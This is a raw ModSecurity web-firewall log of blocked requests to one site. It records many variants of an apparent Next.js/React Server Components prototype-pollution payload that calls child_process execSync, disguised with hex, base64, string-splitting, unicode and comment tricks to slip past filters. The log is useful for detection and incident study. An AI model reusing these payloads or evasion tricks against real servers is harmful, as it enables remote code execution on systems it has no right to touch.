"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/ping"] [unique_id "aaZAcP2xhCLtpShpTOoywQAAANI"] [Tue Mar 03 03:59:12.544282 2026] [:error] [pid 21860:tid 21872] [client 172.94.9.249:47664] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/products"] [unique_id "aaZAcPU_evpVetAt05Vh5QAAAAg"] [Tue Mar 03 03:59:12.648616 2026] [:error] [pid 21979:tid 21993] [client 172.94.9.249:48220] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoywgAAAMw"] [Tue Mar 03 03:59:12.679833 2026] [:error] [pid 21979:tid 22000] [client 172.94.9.249:48220] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var cp=require('child_process');var res=cp.execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoywwAAANM"] [Tue Mar 03 03:59:12.683545 2026] [:error] [pid 21862:tid 21910] [client 172.94.9.249:48104] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPh_lrWoDSo4I3Rn2wAAAIc"] [Tue Mar 03 03:59:12.683743 2026] [:error] [pid 21979:tid 21990] [client 172.94.9.249:48218] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var cmd=Buffer.from('6563686f2024282834343132382a34343438382929','hex').toString();var res=process.mainModule.require('child_process').execSync(cmd,{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${r..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyxAAAAMk"] [Tue Mar 03 03:59:12.684114 2026] [:error] [pid 21860:tid 21881] [client 172.94.9.249:48146] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var cmd=Buffer.from('ZWNobyAkKCg0NDEyOCo0NDQ4OCkp','base64').toString();var res=process.mainModule.require('child_process').execSync(cmd,{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPU_evpVetAt05Vh5gAAABE"] [Tue Mar 03 03:59:12.684224 2026] [:error] [pid 21979:tid 21998] [client 172.94.9.249:48200] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var m='chi' 'ld_' 'pro' 'cess';var f='exe' 'cSy' 'nc';var c=process.mainModule.require(m);var res=c[f]('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_' 'REDIRECT'),{digest:`${res}`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyxQAAANE"] [Tue Mar 03 03:59:12.685398 2026] [:error] [pid 21979:tid 22003] [client 172.94.9.249:47644] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006E\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006F\\x5cu006E\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006C\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22\\x5cu005F\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu0070\\x5cu006F\\x5cu006E\\x5cu0073\\x5cu0065\\x22:{\\x22\\x5cu005F\\x5cu0070\\x5cu0072\\x5cu0065\\x5cu..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyxgAAANY"] [Tue Mar 03 03:59:12.686268 2026] [:error] [pid 21862:tid 21908] [client 172.94.9.249:48064] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPh_lrWoDSo4I3Rn3QAAAIY"] [Tue Mar 03 03:59:12.686555 2026] [:error] [pid 21861:tid 21911] [client 172.94.9.249:47922] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: replace( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo\\x5c\\x5cx00 $((44128*44488))'.replace(/\\x5c\\x5cx00/g,''),{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunk..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcNsyBa6FPxjfniwshgAAAEs"] [Tue Mar 03 03:59:12.686613 2026] [:error] [pid 21862:tid 21902] [client 172.94.9.249:47582] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process\\x5ct.mainModule\\x5ct.require('child_process')\\x5ct.execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPh_lrWoDSo4I3Rn3gAAAIM"] [Tue Mar 03 03:59:12.686843 2026] [:error] [pid 21862:tid 21904] [client 172.94.9.249:47898] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPh_lrWoDSo4I3Rn3AAAAIQ"] [Tue Mar 03 03:59:12.687508 2026] [:error] [pid 21860:tid 21884] [client 172.94.9.249:48228] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/**/res=process/**/.mainModule/**/.require(/**/'child_process'/**/).execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw/**/Object.assign(new/**/Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPU_evpVetAt05Vh6AAAABQ"] [Tue Mar 03 03:59:12.688519 2026] [:error] [pid 21860:tid 21886] [client 172.94.9.249:47914] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:\\x5cu005f\\x5cu005fproto\\x5cu005f\\x5cu005f:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPU_evpVetAt05Vh6QAAABY"] [Tue Mar 03 03:59:12.690002 2026] [:error] [pid 21862:tid 21935] [client 172.94.9.249:48092] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcPh_lrWoDSo4I3Rn3wAAAJM"] [Tue Mar 03 03:59:12.692859 2026] [:error] [pid 21979:tid 21984] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var m=['child','_','process'].join('');var f=['exec','Sync'].join('');var c=process.mainModule.require(m);var res=c[f]('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error(['NEXT','_','REDIRECT'].join('')),..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyyAAAAMM"] [Tue Mar 03 03:59:12.692863 2026] [:error] [pid 21979:tid 21997] [client 172.94.9.249:47824] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('/bin/sh',['-c','echo $((44128*44488))'],{'timeout':60000,'maxBuffer':52428800});var res=r.stdout.toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyyQAAANA"] [Tue Mar 03 03:59:12.693229 2026] [:error] [pid 21979:tid 21988] [client 172.94.9.249:47876] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22{\\x5c\\x22data\\x5c\\x22:{\\x5c\\x22command\\x5c\\x22:\\x5c\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoyygAAAMc"] [Tue Mar 03 03:59:12.700834 2026] [:error] [pid 21861:tid 21899] [client 172.94.9.249:48252] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match 